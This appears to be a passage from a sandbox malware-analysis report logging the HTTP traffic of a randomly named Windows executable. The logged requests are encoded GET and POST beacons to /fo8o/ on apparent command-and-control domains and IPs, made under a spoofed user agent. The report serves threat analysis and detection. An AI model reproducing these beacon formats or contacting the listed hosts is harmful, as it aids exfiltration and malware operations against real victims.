                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a 65 [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJAS [TRUNCATED]
                                                                                      Dec 2, 2024 14:34:03.911516905 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:34:03 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.650033195.110.124.133806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:05.060287952 CET532OUTGET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:34:06.413804054 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:34:06 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.650035217.196.55.202806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:28.844506979 CET795OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f
                                                                                      Data Ascii: U6YDsxW=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
                                                                                      Dec 2, 2024 14:34:30.103638887 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:29 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.650036217.196.55.202806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:31.550024033 CET819OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d
                                                                                      Data Ascii: U6YDsxW=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
                                                                                      Dec 2, 2024 14:34:32.744534969 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:32 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.650037217.196.55.202806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:34.216739893 CET1832OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 31 [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJwHWaHNny3DkcPzc/IfGnB72zQjWKa0reTy4wEsckqATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHeMtIQLo1ulFdPm/WZjwfg3pXLqJzL6uZk/hShK87J/B8NmdNvErSQkufL8hBA6zjEhyI6vGuUgH2s81XeVIDixDbnWIPixe5THOj1QX8Q7yqPkkxjHAxt+ggpiweeAg1wP76LC37rf6GaI5SASvonDhKMK42ZwjLnYCbzLpsDW6+lxtNU6KY0OpSMOyB9tpQUYABR2tO6zcGqRGhFeO8cDb871WKvJV2kIu8VmqYNpIfCSiLUB5tW18VukjKiTAT7SvDARlAZmM0B+L75MyEmXDWkRWxGyClElMITMefbC5NclUvpHwjCf5SM9zzt5tJPtM0o1agCyknjpzI9xq3HAAA9jzk4FKj9oqhUy45KY9s0VPu1RhxhCqTNJI/dYagWk4FoKQ6BMS1OfaNmEP6uVrKjJxiAFwbDOxuZpDRHEcxj4G0SAJ1uVgAfCJvJHZYLtd1wAQFg38hf2B+nsFLyyyOVDGnIfV3zC2fBe2ciH0I0iu4z1N5LddlXlYO6opVxpgLUoopx/pcLClB0CCHpLHlubs768Rp8skFn3/HEWJWZos8nnOPkJnv/DI8jCepFOpl5f5jTCTMFNnHQpyZSCLexonbe5T720PRkZoL1kkMlqK9qSkj3hhJj8P5IdVmldOFK+glMDimMQZOUx5VUGBjfJmbPiUI4HXHsFqq6rYOi2fmLAv6Ut1BwpcdBlY6iYLPL6ryNaK2eSEtNnpR7x0AcHqDGyh0viGZGuVzAxcwL2Y09 [TRUNCATED]
                                                                                      Dec 2, 2024 14:34:35.467267036 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:35 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.650038217.196.55.202806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:36.871335030 CET528OUTGET /fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.empowermedeco.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:34:38.077128887 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:37 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
